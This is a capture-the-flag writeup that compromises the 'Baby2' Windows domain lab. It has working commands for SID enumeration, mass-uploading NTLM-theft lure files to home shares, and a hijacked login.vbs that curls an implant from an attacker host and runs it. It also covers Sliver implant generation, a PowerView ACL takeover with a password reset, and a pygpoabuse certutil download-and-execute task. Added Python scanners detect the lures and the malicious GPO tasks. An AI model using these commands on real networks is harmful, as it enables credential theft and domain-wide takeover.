Machine (Medium) - Baby2
Writeup for the Baby2 machine documents the process of compromising a Windows domain through enumeration, credential capture, and privilege escalation.
Writeup Author: BobBuilder
Objective: This writeup details the steps taken to exploit the Baby2 machine, focusing on domain user enumeration, writable share abuse for credential capture, and privilege escalation via ACL and GPO manipulation.
Category | Difficulty | Platform | Machine Author |
---|---|---|---|
Machine | Medium | Windows | xct |
User
Enumeration
Enumerate Domain Users via SID Bruteforce
impacket-lookupsid baby2.vl/guest:''@<baby2_ip> -no-pass | grep SidTypeUser | awk -F ' ' '{print $2}'
- Brute-forces RIDs over LSARPC as the guest account (empty password) and keeps only the SidTypeUser entries. The awk field still carries the BABY2\ prefix, so strip it when building the baby2_users.txt consumed by the next step.
Extract SPNs for Kerberoasting
impacket-GetUserSPNs -target-domain baby2.vl -usersfile baby2_users.txt baby2.vl/guest -no-pass
- Requests service tickets for every account in the user list; the only entry returned is DC$, the domain controller's machine account. Machine account passwords are long random strings, so this ticket is not crackable in practice and Kerberoasting does not yield a foothold here.
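Turning the lookupsid output into a user list for GetUserSPNs, as an added Python example that is not part of the original writeup. The sample output below is constructed (the RIDs are made up; the account names are the Baby2 accounts that appear elsewhere in this writeup). The parser keeps the SidTypeUser entries, drops the DOMAIN\ prefix that the awk one-liner above leaves in place, and excludes machine accounts such as DC$ unless asked to keep them.

```python
import re

# Constructed sample of impacket-lookupsid output. RIDs are assumed values;
# names are the Baby2 accounts from this writeup. Not real tool output.
SAMPLE_LOOKUPSID = """\
[*] Brute forcing SIDs at <baby2_ip>
[*] StringBinding ncacn_np:<baby2_ip>[\\pipe\\lsarpc]
[*] Domain SID is: S-1-5-21-1234567890-1234567890-1234567890
498: BABY2\\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: BABY2\\Administrator (SidTypeUser)
501: BABY2\\Guest (SidTypeUser)
512: BABY2\\Domain Admins (SidTypeGroup)
1000: BABY2\\DC$ (SidTypeUser)
1104: BABY2\\library (SidTypeUser)
1105: BABY2\\Amelia.Griffiths (SidTypeUser)
1106: BABY2\\Carl.Moore (SidTypeUser)
1107: BABY2\\LEGACY (SidTypeGroup)
1108: BABY2\\GPOADM (SidTypeUser)
"""

# One result line looks like:  <rid>: <DOMAIN>\<name> (<SidType...>)
# Group names may contain spaces, hence the greedy ".+" for the name.
LINE_RE = re.compile(
    r"^(?P<rid>\d+): (?P<domain>[^\\]+)\\(?P<name>.+) \((?P<type>SidType\w+)\)$"
)


def parse_lookupsid(output):
    """Return a list of {rid, domain, name, type} dicts, skipping banner lines."""
    entries = []
    for line in output.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            entry = m.groupdict()
            entry["rid"] = int(entry["rid"])
            entries.append(entry)
    return entries


def user_names(output, include_machine=False):
    """Bare user names (no domain prefix), dropping machine accounts by default."""
    names = []
    for entry in parse_lookupsid(output):
        if entry["type"] != "SidTypeUser":
            continue
        if entry["name"].endswith("$") and not include_machine:
            continue
        names.append(entry["name"])
    return names


def write_users_file(output, path):
    """Write one bare user name per line (the format -usersfile expects)."""
    names = user_names(output)
    with open(path, "w") as fh:
        fh.write("\n".join(names) + "\n")
    return len(names)


if __name__ == "__main__":
    for name in user_names(SAMPLE_LOOKUPSID):
        print(name)
```

Run it against the real output by piping lookupsid into a file and passing the file contents to write_users_file; GetUserSPNs with -usersfile will then see bare names rather than BABY2\name entries.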
Initial Access
Prepare NTLM Stealer Payloads
python3 ntlm_theft.py --generate all --server <attacker_ip> --filename nt
- Generates the full set of lure files (.lnk, .scf, .url, desktop.ini and others) whose icon or resource paths point at the attacker's SMB server, so any client that renders the containing folder authenticates to <attacker_ip> with NTLM.
Upload Payloads to Writable User Folders
for user in "Amelia.Griffiths" "Harry.Shaw" "Kieran.Mitchell" "Mohammed.Harris" \
            "Joan.Jennings" "library" "Nicola.Lamb" "Carl.Moore" "Joel.Hurst" \
            "Lynda.Bailey" "Ryan.Jenkins"; do
    for file in ~/tools/ntlm_theft/nt/*; do
        filename=$(basename "$file")
        # "\\$user\\$filename" expands to \<user>\<file>, the path relative to the share root
        nxc smb <baby2_ip> -u 'guest' -p '' --share homes --put-file "$file" "\\$user\\$filename"
    done
done
- Mass-deploys every lure file into each user's home directory on the guest-writable homes share. A capture listener (for example Responder) must already be running on <attacker_ip>: when a user or a background process browses the folder, Explorer resolves the lure's icon path over SMB and sends a NetNTLMv2 response, which is cracked offline to recover the cleartext passwords listed below.
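The defensive counterpart of the upload loop above, as an added Python example that is not part of the original writeup: a scanner that reads the files in a home folder and flags any whose icon or resource path points at a host outside the domain. The file contents are constructed for this example and modelled on the text lure formats (.url, .scf, desktop.ini); the "nt.lnk" entry is a stand-in carrying a UTF-16LE string, not a real ShellLink file. The trusted host names and the baby2.vl suffix are assumptions.

```python
import re

# Constructed sample of files found under one user's folder on the "homes"
# share. Contents are made up; nt.lnk is only a stand-in for the binary
# ShellLink format (its strings are UTF-16LE), not a real .lnk file.
SAMPLE_FILES = {
    "nt.url": (
        "[InternetShortcut]\r\n"
        "URL=file://10.10.14.5/share/nt.html\r\n"
        "IconFile=\\\\10.10.14.5\\share\\nt.ico\r\n"
        "IconIndex=1\r\n"
    ).encode(),
    "nt.scf": (
        "[Shell]\r\nCommand=2\r\n"
        "IconFile=\\\\10.10.14.5\\share\\nt.ico\r\n"
        "[Taskbar]\r\nCommand=ToggleDesktop\r\n"
    ).encode(),
    "nt.lnk": b"\x4c\x00\x00\x00" + "\\\\10.10.14.5\\share\\nt.ico".encode("utf-16-le"),
    "desktop.ini": (
        "[.ShellClassInfo]\r\n"
        "IconResource=\\\\dc.baby2.vl\\netlogon\\corp.ico,0\r\n"
    ).encode(),
    "notes.txt": b"call back about the library system on Monday\r\n",
}

# Assumed: the DC's names; anything under the domain suffix counts as internal.
TRUSTED_HOSTS = {"dc", "dc.baby2.vl"}
TRUSTED_SUFFIX = ".baby2.vl"

UNC_RE = re.compile(r"\\\\([A-Za-z0-9][A-Za-z0-9._-]*)\\")
FILE_URL_RE = re.compile(r"file://([A-Za-z0-9][A-Za-z0-9._-]*)/", re.I)


def extract_hosts(data: bytes) -> set:
    """Hosts referenced by UNC paths or file:// URLs in the file.
    Text formats are read as latin-1; a second UTF-16LE pass catches the
    wide strings that .lnk files embed."""
    hosts = set()
    for text in (data.decode("latin-1"), data.decode("utf-16-le", errors="ignore")):
        hosts.update(UNC_RE.findall(text))
        hosts.update(FILE_URL_RE.findall(text))
    return {h.lower() for h in hosts}


def is_trusted(host, trusted_hosts=TRUSTED_HOSTS, trusted_suffix=TRUSTED_SUFFIX):
    host = host.lower()
    return host in trusted_hosts or host.endswith(trusted_suffix)


def scan_files(files, trusted_hosts=TRUSTED_HOSTS, trusted_suffix=TRUSTED_SUFFIX):
    """Flag every file whose resource path points at a host outside the domain."""
    findings = []
    for name, data in files.items():
        external = sorted(
            h for h in extract_hosts(data) if not is_trusted(h, trusted_hosts, trusted_suffix)
        )
        if external:
            findings.append({"file": name, "hosts": external})
    return findings


if __name__ == "__main__":
    for finding in scan_files(SAMPLE_FILES):
        print(f"{finding['file']}: external icon/resource host(s) {finding['hosts']}")
```

On a real share, feed scan_files a dict built from the folder contents (for example via smbclient or nxc --get-file); any hit on a user's home folder that points at an address not in the domain is the planted-lure pattern this writeup relies on.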
Captured Credentials
baby2.vl/library:<REDACTED>
baby2.vl/Carl.Moore:<REDACTED>
Root
Post-Exploitation
Abuse Login Script for Code Execution
' Located in SYSVOL/baby2.vl/scripts/login.vbs
Set oShell = CreateObject("Wscript.Shell")
oShell.run "cmd.exe /c curl <attacker_ip>:8081/vl.exe -o C:\Windows\Temp\vl2.exe"
oShell.run "cmd.exe /c C:\Windows\Temp\vl2.exe"
- login.vbs in SYSVOL runs at logon for the users it is assigned to. After authenticating with the captured credentials the script is overwritten with a two-line downloader that fetches the Sliver implant from the attacker's HTTP server on port 8081 and executes it in the context of whichever user logs on next. curl.exe ships with Windows 10 1803 / Server 2019 and later, so no extra tooling is needed on the target.
Generate Sliver Payload
sudo service sliver start
sliver
generate --os windows --arch 64bit --mtls <attacker_ip> --reconnect 60 --save vl.exe
- Generates a 64-bit Windows implant that connects back over mTLS and retries every 60 seconds. generate only writes vl.exe: the binary still has to be served over HTTP (port 8081 for the login script, port 80 for the GPO step below), and an mTLS listener must be started in the Sliver console with the mtls command before the implant can call home.
Privilege Escalation
BloodHound Enumeration
- Revealed that Amelia.Griffiths (a member of BABY2\LEGACY) has WriteOwner over the user GPOADM. The PowerView steps below therefore have to run in a session that holds Amelia.Griffiths's rights, such as a Sliver implant started by her logon script.
Import PowerView and Take Ownership
Import-Module .\PowerView.ps1
Set-DomainObjectOwner -Identity GPOADM -OwnerIdentity Amelia.Griffiths
Add-DomainObjectACL -TargetIdentity GPOADM -PrincipalIdentity Amelia.Griffiths -Rights All
Set-DomainUserPassword -Identity GPOADM -AccountPassword (ConvertTo-SecureString 'Password1' -AsPlainText -Force)
- Takes ownership of GPOADM (WriteOwner only permits changing the owner, but the owner implicitly holds WriteDacl, so the DACL can be rewritten in the next step), grants Amelia.Griffiths full control, and resets the password. The reset is destructive and noisy: the account's real password is lost and the DC logs event 4724 (password reset attempt) and 4738 (user account changed).
Abuse Default Domain GPO
python3 pygpoabuse.py BABY2.vl/gpoadm:Password1 -gpo-id '31B2F340-016D-11D2-945F-00C04FB984F9' -powershell -command "certutil -urlcache -split -f http://<attacker_ip>/vl.exe C:/Users/Public/vl.exe; C:/Users/Public/vl.exe" -f
- Adds an immediate scheduled task to the Default Domain Policy (the well-known GUID 31B2F340-016D-11D2-945F-00C04FB984F9), which is linked at the domain root and therefore applies to every computer, including the DC. On the next policy refresh (gpupdate /force on the target, otherwise up to 90 minutes plus a random offset) the task runs as SYSTEM, downloads vl.exe with certutil and executes it, handing back a SYSTEM-level Sliver session on the domain controller. pygpoabuse needs an account with write access to the policy's AD object and SYSVOL folder, which is why GPOADM was the target of the ACL chain.
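A detection-side check for the GPO abuse above, as an added Python example that is not part of the original writeup or of pygpoabuse. It parses a Group Policy Preferences ScheduledTasks.xml (the file pygpoabuse writes under Policies\{GUID}\Machine\Preferences\ScheduledTasks\ in SYSVOL) and flags immediate tasks running as SYSTEM and any task whose command line shows download-and-execute indicators. The XML below is constructed for this example in the shape of such a file (clsid attributes omitted); it is not pygpoabuse's literal output, and the indicator list is an assumption to be tuned per environment.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample shaped like a GPP ScheduledTasks.xml. The first task is a
# benign scheduled job; the second is what the writeup's certutil command would
# roughly look like once written as an immediate task. Not real tool output.
SAMPLE_TASKS_XML = r"""<ScheduledTasks>
  <TaskV2 name="InventoryScan" image="0">
    <Properties action="C" name="InventoryScan" runAs="BABY2\svc_inventory" logonType="Password">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec>
            <Command>C:\Program Files\Inventory\scan.exe</Command>
            <Arguments>/quiet</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </TaskV2>
  <ImmediateTaskV2 name="TASK_1" image="0">
    <Properties action="C" name="TASK_1" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec>
            <Command>powershell.exe</Command>
            <Arguments>-NoP -NonI -W Hidden -Command "certutil -urlcache -split -f http://&lt;attacker_ip&gt;/vl.exe C:/Users/Public/vl.exe; C:/Users/Public/vl.exe"</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
</ScheduledTasks>
"""

# Assumed indicator set; extend or loosen to taste.
INDICATORS = {
    "certutil-download": re.compile(r"certutil(\.exe)?\b.*-urlcache", re.I),
    "remote-url": re.compile(r"https?://", re.I),
    "powershell-hidden-or-encoded": re.compile(
        r"powershell(\.exe)?\b.*(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|\biex\b|downloadstring)", re.I
    ),
    "world-writable-path": re.compile(
        r"[\\/]Users[\\/]Public[\\/]|[\\/]Windows[\\/]Temp[\\/]|[\\/]ProgramData[\\/]", re.I
    ),
    "unc-path": re.compile(r"\\\\[A-Za-z0-9._-]+\\"),
}


def scan_gpp_tasks(xml_text):
    """Return one finding per suspicious task: name, element type, runAs, commands, reasons."""
    root = ET.fromstring(xml_text)
    findings = []
    for task in root:
        props = task.find("Properties")
        if props is None:
            continue
        run_as = props.get("runAs", "")
        reasons = []
        # An immediate task that runs as SYSTEM is the classic GPO-abuse shape.
        if task.tag == "ImmediateTaskV2" and "system" in run_as.lower():
            reasons.append("immediate-task-as-system")
        cmdlines = []
        for exec_el in props.iter("Exec"):
            parts = (exec_el.findtext("Command"), exec_el.findtext("Arguments"))
            cmdline = " ".join(p for p in parts if p).strip()
            cmdlines.append(cmdline)
            reasons.extend(k for k, rx in INDICATORS.items() if rx.search(cmdline))
        if reasons:
            findings.append({
                "task": props.get("name") or task.get("name"),
                "type": task.tag,
                "runAs": run_as,
                "commands": cmdlines,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_gpp_tasks(SAMPLE_TASKS_XML):
        print(f"{finding['type']} {finding['task']} as {finding['runAs']}: {', '.join(finding['reasons'])}")
```

Pair this with a watch on the policy's gpt.ini version number and on the gPCMachineExtensionNames attribute of the GPO object: pygpoabuse has to bump the former and register the scheduled-tasks CSE in the latter for the task to apply, so both change at the moment the Default Domain Policy is weaponised.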